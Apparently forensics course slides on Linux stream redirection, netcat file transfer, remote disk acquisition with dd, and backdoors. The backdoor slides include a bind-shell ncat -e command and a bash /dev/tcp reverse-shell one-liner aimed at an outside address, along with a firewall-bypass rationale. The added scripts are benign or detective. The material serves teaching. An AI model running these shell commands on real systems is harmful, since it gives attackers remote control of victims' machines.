4_Advanced_linux_command_line

The document outlines advanced Linux commands for remote file and disk acquisition, focusing on standard input/output/error devices and network utilities. It details methods for creating backdoors and reverse shells for remote access, as well as techniques for remote disk acquisition. Additionally, it includes practical assignments and references for further learning on the topics discussed.
Advanced Linux Commands
Remote File/Disk Acquisition
Outline
• Standard input/output/error devices
• Network utilities use standard devices
• Create a backdoor on Windows 10 / Remote File Acquisition
• Reverse shell
• Remote disk acquisition
Standard input/output/error devices
Input and output devices are files (0, 1, 2)!
FILE_DESCRIPTOR 0, 1, 2
• 0< : input to the process (keyboard/file)
• 1> : output from the process (display/file)
• 2> : error output from the process (display/file)
Standard input: stdin (0< input)
cat: display the content of a file
1. Tell cat to take its input from myfile.txt directly
2. Send the content of myfile.txt to the input device (0) and tell cat to take its input from that device
3. Same as 2 (0 is the default input device)
Standard output: stdout (1> output)
echo uses the default input (0<) and output (1>) devices
Standard error: stderr (2> err)
cat: save the error messages to a file, error.txt, because the system can't find foo.txt
Network utilities use standard devices
Chatting
• By default, netcat uses the TCP (Transmission Control Protocol) protocol
• By default, netcat does not save the incoming data to a file; it simply writes the received data to the terminal (stdout, 1)
Forensic Data Transfer
• step 1: listen
• step 2: send the file to the listener's input device (0)
• step 3: stop the process
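The three steps above, run between two ncat processes on one host, as an added example that is not from the slides; it adds the check a forensic transfer needs, hashing both ends. It assumes ncat (the nmap build the deck uses), sha256sum, timeout and mktemp are installed; port 10000, the loopback address and the sample file are constructed values.

```shell
#!/bin/sh
# Added example, not from the original slides. Assumes ncat, sha256sum,
# timeout and mktemp. Both ends run on this host over 127.0.0.1.

# usage: nc_evidence_copy <source-file> [port]
# prints "match" when the received copy hashes the same as the source,
# "mismatch" otherwise, or "skipped" when ncat is not installed.
nc_evidence_copy() (
    set +e                     # report mismatch instead of aborting silently
    src=$1; port=${2:-10000}
    command -v ncat >/dev/null 2>&1 || { echo skipped; exit 0; }
    out=$(mktemp) || exit 1

    # step 1: listen. Received bytes go to stdout (fd 1), redirected into
    # $out. --recv-only keeps the listener from reading its own stdin;
    # timeout bounds a listener that never gets a connection.
    timeout 10 ncat -l --recv-only 127.0.0.1 "$port" > "$out" &
    lpid=$!
    sleep 1      # give the listener a moment to bind the port

    # step 2: send. The file becomes the sender's stdin (fd 0); ncat
    # closes the connection at EOF, which ends the listener as well.
    timeout 10 ncat --send-only 127.0.0.1 "$port" < "$src"

    # step 3: the listener stops on its own; wait for it, then verify
    wait "$lpid"
    h_src=$(sha256sum < "$src" | cut -d' ' -f1)
    h_out=$(sha256sum < "$out" | cut -d' ' -f1)
    rm -f "$out"
    [ "$h_src" = "$h_out" ] && echo match || echo mismatch
)

# Dry run on a constructed evidence file (not real evidence).
nc_evidence_demo() {
    f=$(mktemp) || return 1
    printf 'hello evidence\n' > "$f"
    nc_evidence_copy "$f" 10000
    rm -f "$f"
}
```

Record both hashes alongside the received file; a copy whose hash does not match the source is not evidence.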
Your work
Goal: Communication between two machines
Goal
• Send files from Kali to Windows 10
• Solution
• Use Zenmap
• netcat is integrated into Zenmap
This slide: send a file from Linux to Windows
Your homework: send a file from Windows to Linux
Create a backdoor on Windows 10 / Remote File Acquisition
Same Goal
• Attack: remote access to a victim's PC
• Digital forensics: remote evidence acquisition
Backdoor background
1. Let a victim listen to a hidden communication channel (backdoor): start the listener first
2. Send a signal to activate the communication channel: start the client second
[Diagram: Server / Victim and Client / Attacker connected over tcp. The client puts input into the victim's std input and receives the victim's std output.]

Server listens on port 8080.
-e: program to execute after the connection occurs, connecting STDIN and STDOUT to the program
cmd.exe: the shell command for Windows
ncat -l 10000 -e /bin/bash    # if creating a backdoor on Linux

Reverse Shell
A new type of backdoor
Motivation
• A normal backdoor on the victim's PC needs to be activated by the attacker
• The victim can set up a firewall to block the incoming connection request
How to bypass the firewall?
• The firewall doesn't block signals sent from the victim
• Let the victim send the signal
• Let the attacker listen for the signal
Reverse shell
Think of it like a phone call in reverse. Instead of you calling someone else, the remote computer is calling the attacker's computer, and the attacker is able to answer the call and take control.
Reverse shell definition
• A reverse shell is getting the connection from the victim or target to your computer
Reverse shell demo
1. Let a victim send a signal to activate the communication channel
2. Listen to a hidden communication channel
[Diagram: Client / Victim and Server / Attacker connected over tcp. The attacker puts input into the victim's std input and receives the victim's std output.]
Reverse shell
Victim sends signals
Attacker listens on port 8080 first
-e: program to execute after the connection occurs, connecting STDIN and STDOUT to the program
cmd.exe: the shell command for Windows
ncat -l 10000 -e /bin/bash    # if creating a backdoor on Linux
Remote Disk Acquisition
Demo only
Remote disk acquisition scenario: both machines must be in the same network
dd command
ncat: https://nmap.org/download (nc)
dd: http://www.chrysocome.net/downloads/dd-0.5.zip
Do you have enough disk space in Linux to save the acquired Windows image? Check both Linux and Windows disk space
Remote disk acquisition: Linux
Waiting for the disk image file
Remote disk acquisition: Windows partitions
Locate the C: drive
Locate partitions
\\?\Device\Harddisk0\Partition0
Remote disk acquisition: Windows
Acquire Windows disk partition 0 and transfer it to Linux
Make sure dd is downloaded
Verify that Linux is receiving the disk image (receiving disk image data)
Acquire Windows disk partition 0 and transfer it to Linux (alternative, with a different block size)
Issue: Remote disk acquisition is slow
• The optimal block size (bs value) depends on various factors
• Type of storage
• I/O patterns
• System characteristics
• Solution
• Experimentation to find the best value
• The best solution (only works when using dd in Linux)
• Write a script to automate the experiments
Auto speed testing (only dd in Linux)
Download the speed test shell script
Change it to executable and verify the test shell script
Find the optimized block size
We have to manually try the optimized block size
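The automated block-size experiment the slides recommend, as an added example that is not the deck's own speed-test script: each candidate bs is timed on a read-only dd pass and the fastest is reported. It assumes GNU coreutils (dd, date +%s%N) on Linux; the 16 MiB source in the demo is a constructed file standing in for a device such as /dev/sdb.

```shell
#!/bin/sh
# Added example, not the deck's own script. Assumes GNU coreutils on Linux.

# usage: find_best_bs <source> <bs>...   e.g. find_best_bs /dev/sdb 4K 64K 1M
# Times one read-only dd pass per block size and prints the fastest one.
# Per-size timings go to stderr (fd 2) so stdout (fd 1) carries only the answer.
find_best_bs() {
    src=$1; shift
    best=""; best_ns=""
    for bs in "$@"; do
        start=$(date +%s%N)
        # of=/dev/null: the source is only read, nothing is written anywhere
        dd if="$src" of=/dev/null bs="$bs" 2>/dev/null || continue
        ns=$(( $(date +%s%N) - start ))
        echo "bs=$bs elapsed=${ns}ns" >&2
        if [ -z "$best_ns" ] || [ "$ns" -lt "$best_ns" ]; then
            best=$bs; best_ns=$ns
        fi
    done
    [ -n "$best" ] && echo "$best"
}

# Dry run on a constructed 16 MiB file (not a real disk image); prints the winning bs.
bs_demo() {
    f=$(mktemp) || return 1
    dd if=/dev/zero of="$f" bs=1M count=16 2>/dev/null
    find_best_bs "$f" 512 4K 64K 1M
    rm -f "$f"
}
```

Run it against the real source device as root before the acquisition, then pass the winning value as bs= to the dd that feeds ncat.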
Summary
• There are two places programs send output to: Standard output (stdout) and Standard Error (stderr);
• You can redirect these outputs to a different place (like a file);
• File descriptors are used to identify stdout (1) and stderr (2);
• command > output is just a shortcut for command 1> output;
• You can use &[FILE_DESCRIPTOR] to reference a file descriptor value;
• Using 2>&1 will redirect stderr to whatever value is set to stdout (and 1>&2 will do the opposite).
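The redirections listed in this summary and used on the stdin/stdout/stderr slides (cat 0< myfile.txt, echo 1> file, cat foo.txt 2> error.txt, 2>&1), exercised in one added example that is not from the slides; it assumes a POSIX sh with coreutils and works in a scratch directory it removes afterwards.

```shell
#!/bin/sh
# Added example, not from the original slides. Assumes POSIX sh + coreutils.
# Prints one token per check: a b c out err both only
stream_demo() (
    set +e                      # cat on a missing file exits 1; that is the point
    dir=$(mktemp -d) && cd "$dir" || exit 1

    # 1> : echo's stdout (fd 1) lands in myfile.txt instead of the display
    echo hello 1> myfile.txt

    # The three ways of reading it from the 'Standard input' slide:
    cat myfile.txt > a.txt        # 1. cat opens the file by name
    cat 0< myfile.txt > b.txt     # 2. the shell makes fd 0 the file, cat reads stdin
    cat < myfile.txt > c.txt      # 3. same as 2: 0 is the default for '<'

    # 2> : stderr (fd 2) goes to error.txt. foo.txt does not exist, so
    # out.txt stays empty and the "No such file" message is saved
    cat foo.txt 1> out.txt 2> error.txt

    # 2>&1 : stderr follows wherever stdout points at that moment (both.txt)
    cat myfile.txt foo.txt > both.txt 2>&1

    # Order matters: 2>&1 is applied before > only.txt, so stderr is copied
    # to the *current* stdout (/dev/null here) and only.txt gets stdout alone
    { cat myfile.txt foo.txt 2>&1 > only.txt; } > /dev/null

    a=$(cat a.txt); b=$(cat b.txt); c=$(cat c.txt)
    out=$(( $(wc -c < out.txt) )); err=$(( $(wc -l < error.txt) ))
    both=$(( $(wc -l < both.txt) )); only=$(( $(wc -l < only.txt) ))
    cd / && rm -rf "$dir"
    echo "$a $b $c $out $err $both $only"
)
```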
Summary
• Bind shell - the attacker's machine acts as a client and the victim's machine acts as a server, opening a communication port on the victim and waiting for the client to connect to it and then issue commands that will be executed remotely (with respect to the attacker) on the victim's machine.
• A firewall etc. may block the bind shell
Summary
Reverse Shell - the attacker's machine acts as a server. It opens a communication channel on a port and waits for incoming connections. The victim's machine acts as a client and initiates a connection to the attacker's listening server.
This is exactly what is done by the following:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
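Both the bind shell (ncat -e) and the reverse shell line above end in the same state: a shell whose stdin and stdout are a TCP socket rather than a terminal, and that shape is what a responder can look for. The detector below is an added example, not from the slides; it walks a procfs-style tree (Linux /proc layout, <pid>/comm and <pid>/fd/N, assumed) and reports shells whose fd 0 and fd 1 are sockets. The fake_proc snapshot is constructed for a dry run.

```shell
#!/bin/sh
# Added example, not from the original slides. Assumes the Linux /proc layout.
# Reading another user's fd links needs root, so run the real scan as root.

# usage: socket_shells [procroot]   (default /proc)
# Prints "<pid> <comm> fd=<list>" for each shell whose stdin (0) and
# stdout (1) are sockets, the shape left by ncat -e and bash -i >& /dev/tcp/...
socket_shells() {
    root=${1:-/proc}
    for d in "$root"/[0-9]*; do
        [ -r "$d/comm" ] || continue
        comm=$(cat "$d/comm")
        case "$comm" in
            sh|bash|dash|zsh|ksh) ;;      # only shell processes are of interest
            *) continue ;;
        esac
        hits=""
        for fd in 0 1 2; do
            target=$(readlink "$d/fd/$fd" 2>/dev/null) || continue
            case "$target" in socket:*) hits="$hits$fd" ;; esac
        done
        # one socket fd alone is common; stdin and stdout both on a
        # socket is the backdoor shape
        case "$hits" in *0*1*) echo "${d##*/} $comm fd=$hits" ;; esac
    done
}

# Constructed procfs snapshot for a dry run (not a real capture): pid 100 is
# a bash with fds 0-2 on one socket, pid 101 a normal bash on a pty, and
# pid 102 a daemon (not a shell) on a socket. Prints the snapshot's root.
fake_proc() {
    fp=$(mktemp -d) || return 1
    mk() {                              # mk <pid> <comm> <fd target>
        mkdir -p "$fp/$1/fd" && echo "$2" > "$fp/$1/comm"
        for n in 0 1 2; do ln -s "$3" "$fp/$1/fd/$n"; done
    }
    mk 100 bash 'socket:[4242]'
    mk 101 bash /dev/pts/0
    mk 102 sshd 'socket:[9]'
    echo "$fp"
}
```

The socket inode in the reported fd link can be matched against ss -tnp or /proc/net/tcp to recover the remote address the shell is bound to.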

Assignment
• Create a file in Windows
• Name it yourFirstLastNameEvidence.txt
• The content of the file: “hello yourname!”
• You are not allowed to touch Windows directly after you create the file
• You are allowed to access Windows from Kali
• Assume nmap is installed
• Remotely acquire the file from Kali
• Use command lines, e.g., nc
https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell
Extra credit: another approach for a reverse shell (see the link above); compare the differences.
Reference
• http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html
• https://en.wikipedia.org/wiki/Standard_streams
• https://www.brianstorti.com/understanding-shell-script-idiom-redirect/
• https://www.computerhope.com/unix/nc.htm
• https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
• https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell
